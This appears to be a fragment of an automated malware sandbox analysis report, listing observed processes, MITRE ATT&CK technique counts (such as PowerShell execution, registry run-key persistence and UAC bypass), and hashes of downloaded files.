[1] C:\Windows\system32\conhost.exe (PID 680)
    cmdline: \??\C:\Windows\system32\conhost.exe "-14290032001977581502-1167130930804857847-1050591789-1248000509-116033514-1833686141"
[1] C:\Windows\system32\conhost.exe (PID 2924)
    cmdline: \??\C:\Windows\system32\conhost.exe "-21178246444043026041035671815-1639937368649279741-1203930188652175147-1808066143"
[1] C:\Windows\system32\conhost.exe (PID 2288)
    cmdline: \??\C:\Windows\system32\conhost.exe "-736384577436726691618780492626376882135870672353787918398958935-1296483512"
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (3)
  - JavaScript (1)
  - PowerShell (1)
- System Services (2)
  - Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Power Settings (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
  - Windows Service (3)
Downloads
(unnamed download)
Filesize: 2KB
MD5: 82f229d0c36b68073da70ef5958e425d
SHA1: 2beb8cd227b49b1d119165d6e3d258ddb730387a
SHA256: 0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394
SHA512: 4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

(unnamed download)
Filesize: 27KB
MD5: 238ec4d17050e1841e8e0171407c2260
SHA1: 2c8c14b257641f1e1151c6303dabde01621314f2
SHA256: 163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb
SHA512: 3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 7318eaa35e34d1bbf4e064218747b9bc
SHA1: 062dc8d401554ad1235e277682b5535958d20549
SHA256: 5fafb8b714d770e479639e34e66b01c2455c348d78f2dde3445bbc0158a5086d
SHA512: a5cc2603ccae43a53215ec26032290f22d57df3647e980fec72b00bbe48b9d53b4f7e20d57f1bca114eb5e40a7cd407aaeaf9a3057f1964b5e5c469b85a67d7f

(unnamed download)
Filesize: 7.3MB
MD5: c9e6aa21979d5fc710f1f2e8226d9dfe
SHA1: d881f97a1fe03f43bed2a9609eae65531cf710cf
SHA256: a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d
SHA512: 9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627